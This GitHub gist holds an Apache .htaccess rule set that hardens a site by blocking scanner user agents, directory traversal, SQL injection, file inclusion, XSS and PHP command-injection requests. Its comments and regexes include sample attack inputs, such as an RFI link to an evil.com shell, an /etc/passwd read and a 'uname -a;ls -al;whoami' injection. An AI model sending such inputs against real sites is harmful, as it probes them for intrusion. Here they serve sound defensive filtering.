Skip to content

Instantly share code, notes, and snippets.

@iamstoick

iamstoick/htaccess.md

Created July 23, 2018 06:53
Show Gist options
  • Save iamstoick/4080529b8104b33784855552e38f07ea to your computer and use it in GitHub Desktop.
Save iamstoick/4080529b8104b33784855552e38f07ea to your computer and use it in GitHub Desktop.
Download ZIP
Apache htaccess hardened
Raw
htaccess.md 
# Hardened Apache Mod_Rewrite Security Rule 
# Provided by Aung Khant,http://yehg.net 
# Last Updated: 2011-02-24 
# Note: You must experiment which strings make access denied in normal clean traffic. Remove such rules. Contact me if you can't. 
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html
# rewritecond 
# NC = 'nocase|NC' (no case-sensitive) 
# OR = 'ornext|OR' (or next condition) 
# L = last rule 

RewriteEngine on 

# Allow only GET and POST verbs 
# 'Coz most vul scanners use HEAD for hunting buggy files existence 

RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR] 

# Ban Typical Vulnerability Scanners and others 
# Kick out Script Kiddies 

RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR] 

# void of UserAgent 

RewriteCond %{HTTP_USER_AGENT} ^.*(0d 0a|sqlmap|ApacheBench|WhatWeb|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|lynx|Netsparker|Nstalker|ZmEu|libwww|perl|java|curl|ruby|python|nikto|wikto|pikto|pykto|scan|acunetix|qualys|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r|w3af).* [NC,OR] 
RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|wget|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR] 

# Disable access to cgi-bins if not used 

RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR] 

# Block out common attack strings 
# Additional filtering can be put into 
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT 
# Directory Travarsal, Null Byte Injection, HTTP Response Splitting 

RewriteCond %{QUERY_STRING} ^.*(\.\./|\.\.%2f|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR] 

# SQL Injection Probing 

RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR] 
RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR] 

# Remote/Local File Inclusion 
# RFI: yoursite.com/?pg=http://evil.com/shell.txt? 
# LFI: yoursite.com/?pg=/logs/access_log? 

RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR] 
RewriteCond %{QUERY_STRING} (passwd|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR] 

# PHP Version Probing 

RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR] 

# XSS Probing 

RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR] 
RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR] 

# PHP GLOBALS Overriding 

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR] 

# PHP REQUEST variable Overriding 

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR] 

# PHP Command Injection Probing 
# vuln.php?exec=uname -a;ls -al;whoami 

RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).* 

# Deny access 

RewriteRule ^(.*)$ /path/to/friendly_errror.php [F,L]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment